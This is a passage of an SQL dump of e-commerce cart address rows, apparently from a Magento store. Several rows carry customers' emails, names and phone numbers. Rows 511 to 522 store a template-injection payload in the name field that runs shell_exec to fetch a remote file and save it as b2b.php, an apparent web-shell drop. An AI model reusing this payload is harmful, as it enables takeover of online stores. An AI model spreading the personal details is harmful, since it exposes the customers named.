(489, 426, '2024-09-28 01:54:22', '2024-09-28 01:54:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(490, 426, '2024-09-28 01:54:22', '2024-09-28 01:54:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(491, 427, '2024-09-28 19:21:18', '2024-09-28 19:21:18', 102, 0, NULL, 'billing', 'alileasm@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(492, 427, '2024-09-28 19:21:18', '2024-09-28 19:21:18', 102, 0, NULL, 'shipping', 'alileasm@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(493, 428, '2024-10-01 09:48:08', '2024-10-01 09:48:08', 103, 0, NULL, 'billing', 'cofcgirl101@yahoo.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(494, 428, '2024-10-01 09:48:08', '2024-10-01 09:48:08', 103, 0, NULL, 'shipping', 'cofcgirl101@yahoo.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(495, 429, '2024-10-09 08:33:07', '2024-10-09 08:33:07', NULL, 0, NULL, 'billing', NULL, NULL, 'Shad', NULL, 'Muhammad', NULL, 'Billion Stars', 'Bangladesh', 'Dhaka', NULL, NULL, '1342', 'BD', '01710000000', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(496, 429, '2024-10-09 08:33:07', '2024-10-09 08:34:42', NULL, 0, NULL, 'shipping', NULL, NULL, 'Shad', NULL, 'Muhammad', NULL, 'Billion Stars', 'Bangladesh', 'Dhaka', NULL, NULL, '1342', 'BD', '01710000000', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, -128.6000, -128.6000, 519.4000, 519.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(497, 430, '2024-10-18 10:25:07', '2024-10-18 10:25:07', 104, 0, NULL, 'billing', 'steelesimfoniyax8834@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(498, 430, '2024-10-18 10:25:07', '2024-10-18 10:25:07', 104, 0, NULL, 'shipping', 'steelesimfoniyax8834@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(499, 431, '2024-10-21 19:10:26', '2024-10-21 19:10:26', 105, 0, NULL, 'billing', 'kassiaanu31@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(500, 431, '2024-10-21 19:10:26', '2024-10-21 19:10:26', 105, 0, NULL, 'shipping', 'kassiaanu31@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(501, 432, '2024-10-26 02:34:17', '2024-10-26 02:34:17', 106, 0, NULL, 'billing', 'sanngravesz7143@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(502, 432, '2024-10-26 02:34:17', '2024-10-26 02:34:17', 106, 0, NULL, 'shipping', 'sanngravesz7143@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(503, 433, '2024-11-04 11:58:35', '2024-11-04 11:58:35', 107, 0, NULL, 'billing', 'wvvvferijxmff@yahoo.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(504, 433, '2024-11-04 11:58:36', '2024-11-04 11:58:36', 107, 0, NULL, 'shipping', 'wvvvferijxmff@yahoo.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(505, 434, '2024-11-17 09:57:20', '2024-11-17 09:57:20', 108, 0, NULL, 'billing', 'wores42102@gianes.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(506, 434, '2024-11-17 09:57:20', '2024-11-17 09:57:20', 108, 0, NULL, 'shipping', 'wores42102@gianes.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(507, 435, '2025-01-03 19:33:39', '2025-01-03 19:33:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(508, 435, '2025-01-03 19:33:39', '2025-01-03 19:33:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(509, 436, '2025-01-07 07:43:00', '2025-01-07 07:43:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(510, 436, '2025-01-07 07:43:00', '2025-01-07 07:43:00', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(511, 437, '2025-01-28 07:29:49', '2025-01-28 07:29:49', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Los Angels', 'California', 12, '90017', 'US', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(512, 437, '2025-01-28 07:29:49', '2025-01-28 07:30:00', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Los Angels', 'California', 12, '90017', 'US', '3455543453', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(513, 438, '2025-01-28 07:30:20', '2025-01-28 07:30:20', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, 'Ouverture\n214', 'Eindhoven', 'Noord-Brabant', 32, '5629PX', 'NL', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(514, 438, '2025-01-28 07:30:20', '2025-01-28 07:30:24', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, 'Ouverture\n214', 'Eindhoven', 'Noord-Brabant', 32, '5629PX', 'NL', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(515, 439, '2025-01-28 07:30:49', '2025-01-28 07:30:49', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Schaffhausen', 120, '2345', 'CH', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(516, 439, '2025-01-28 07:30:49', '2025-01-28 07:30:55', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Schaffhausen', 120, '2345', 'CH', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(517, 440, '2025-01-28 07:31:15', '2025-01-28 07:31:15', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'London', 'London', 579, 'AB12 3DC', 'GB', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(518, 440, '2025-01-28 07:31:15', '2025-01-28 07:31:21', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'London', 'London', 579, 'AB12 3DC', 'GB', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(519, 441, '2025-01-28 07:31:39', '2025-01-28 07:31:39', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Paris', 'Paris', 579, '23423', 'FR', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(520, 441, '2025-01-28 07:31:39', '2025-01-28 07:31:44', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Paris', 'Paris', 579, '23423', 'FR', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(521, 442, '2025-01-28 07:32:02', '2025-01-28 07:32:02', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Baja California Sur', 579, '23454', 'MX', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(522, 442, '2025-01-28 07:32:02', '2025-01-28 07:32:07', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Baja California Sur', 579, '23454', 'MX', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(523, 443, '2025-02-05 11:09:15', '2025-02-05 11:09:15', 110, 0, NULL, 'billing', 'hotoxo5768@numerobo.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(524, 443, '2025-02-05 11:09:15', '2025-02-05 11:09:15', 110, 0, NULL, 'shipping', 'hotoxo5768@numerobo.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(525, 444, '2025-02-07 15:51:21', '2025-02-07 15:51:21', NULL, 0, NULL, 'billing', NULL, NULL, 'Vivien', NULL, 'Wilderman', NULL, 'Vivien Company', '709 Naylor Ln', 'Ridgeland', 'Mississippi', NULL, '39157', 'US', '863.675.1915', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(526, 444, '2025-02-07 15:51:21', '2025-02-07 15:51:27', NULL, 0, NULL, 'shipping', NULL, NULL, 'Vivien', NULL, 'Wilderman', NULL, 'Vivien Company', '709 Naylor Ln', 'Ridgeland', 'Mississippi', 35, '39157', 'US', '863.675.1915', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
